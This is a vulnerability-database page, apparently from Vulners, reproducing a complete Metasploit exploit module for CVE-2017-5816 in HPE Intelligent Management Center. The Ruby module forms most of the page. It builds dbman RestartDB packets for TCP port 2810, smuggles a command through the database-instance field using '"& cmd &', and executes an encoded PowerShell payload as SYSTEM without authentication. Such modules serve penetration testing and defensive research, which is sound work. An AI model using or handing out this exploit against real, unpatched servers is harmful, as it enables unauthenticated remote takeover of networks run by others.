Vulners
Lucene search
HPE iMC - dbman 'RestartDB' Remote Command Execution (Metasploit)
| Reporter | Title | Published | Views | Family All 22 |
|---|---|---|---|---|
 | HP iMC Plat 7.2 - Remote Code Execution Exploit (2) | 2 Dec 201700:00 | – | zdt |
| HPE iMC dbman RestartDB Unauthenticated Remote Command Execution Exploit | 10 Jan 201800:00 | – | zdt |
 | CVE-2017-5816 | 29 Nov 201700:00 | – | circl |
 | HPE Intelligent Management Center PLAT Arbitrary Code Execution Vulnerability (CNVD-2017-07183) | 18 May 201700:00 | – | cnvd |
 | HPE Intelligent Management Center dbman RestartDB Command Injection (CVE-2017-5816) | 28 Jun 201700:00 | – | checkpoint_advisories |
 | CVE-2017-5816 | 15 Feb 201822:00 | – | cve |
 | CVE-2017-5816 | 15 Feb 201822:00 | – | cvelist |
 | HP iMC Plat 7.2 - Remote Code Execution (2) | 29 Nov 201700:00 | – | exploitdb |
 | HP iMC Plat 7.2 - Remote Code Execution (2) | 29 Nov 201700:00 | – | exploitpack |
 | H3C / HPE Intelligent Management Center PLAT < 7.3 E0504P04 Multiple Vulnerabilities | 19 Jun 201700:00 | – | nessus |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
def initialize(info = {})
super(update_info(info,
'Name' => 'HPE iMC dbman RestartDB Unauthenticated RCE',
'Description' => %q{
This module exploits a remote command execution vulnerablity in
Hewlett Packard Enterprise Intelligent Management Center before
version 7.3 E0504P04.
The dbman service allows unauthenticated remote users to restart
a user-specified database instance (OpCode 10008), however the
instance ID is not sanitized, allowing execution of arbitrary
operating system commands as SYSTEM. This service listens on
TCP port 2810 by default.
This module has been tested successfully on iMC PLAT v7.2 (E0403)
on Windows 7 SP1 (EN).
},
'License' => MSF_LICENSE,
'Author' =>
[
'sztivi', # Discovery
'Chris Lyne', # Python PoC (@lynerc)
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'References' =>
[
['CVE', '2017-5816'],
['EDB', '43198'],
['ZDI', '17-340'],
['URL', 'https://www.securityfocus.com/bid/98469/info'],
['URL', 'https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us']
],
'Platform' => 'win',
'Targets' => [['Automatic', {}]],
'Payload' => { 'BadChars' => "\x00" },
'DefaultOptions' => { 'WfsDelay' => 15 },
'Privileged' => true,
'DisclosureDate' => 'May 15 2017',
'DefaultTarget' => 0))
register_options [Opt::RPORT(2810)]
end
def check
# empty RestartDB packet
pkt = [10008].pack('N')
connect
sock.put pkt
res = sock.get_once
disconnect
# Expected reply:
# "\x00\x00\x00\x01\x00\x00\x00:08\x02\x01\xFF\x043Dbman deal msg error, please to see dbman_debug.log"
return CheckCode::Detected if res =~ /dbman/i
CheckCode::Safe
end
def dbman_msg(db_instance)
data = ''
db_ip = "#{rand(255)}.#{rand(255)}.#{rand(255)}.#{rand(255)}"
db_type = "\x04" # SQL Server
db_sa_username = rand_text_alpha rand(1..5)
db_sa_password = rand_text_alpha rand(1..5)
ora_db_ins = rand_text_alpha rand(1..5)
# dbIp
data << "\x04"
data << [db_ip.length].pack('C')
data << db_ip
# iDBType
data << "\x02"
data << [db_type.length].pack('C')
data << db_type
# dbInstance
data << "\x04"
data << "\x82"
data << [db_instance.length].pack('n')
data << db_instance
# dbSaUserName
data << "\x04"
data << [db_sa_username.length].pack('C')
data << db_sa_username
# dbSaPassword
data << "\x04"
data << [db_sa_password.length].pack('C')
data << db_sa_password
# strOraDbIns
data << "\x04"
data << [ora_db_ins.length].pack('C')
data << ora_db_ins
data
end
def dbman_restartdb_pkt(db_instance)
data = dbman_msg db_instance
# opcode 10008 (RestartDB)
pkt = [10008].pack('N')
# packet length
pkt << "\x00\x00"
pkt << [data.length + 4].pack('n')
# packet data length
pkt << "\x30\x82"
pkt << [data.length].pack('n')
# packet data
pkt << data
pkt
end
def execute_command(cmd, _opts = {})
connect
sock.put dbman_restartdb_pkt "\"& #{cmd} &"
disconnect
end
def exploit
command = cmd_psh_payload(
payload.encoded,
payload_instance.arch.first,
{ :remove_comspec => true, :encode_final_payload => true }
)
if command.length > 8000
fail_with Failure::BadConfig, "#{peer} - The selected payload is too long to execute through Powershell in one command"
end
print_status "Sending payload (#{command.length} bytes)..."
execute_command command
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Jan 2018 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 39.8
CVSS 210
EPSS0.89949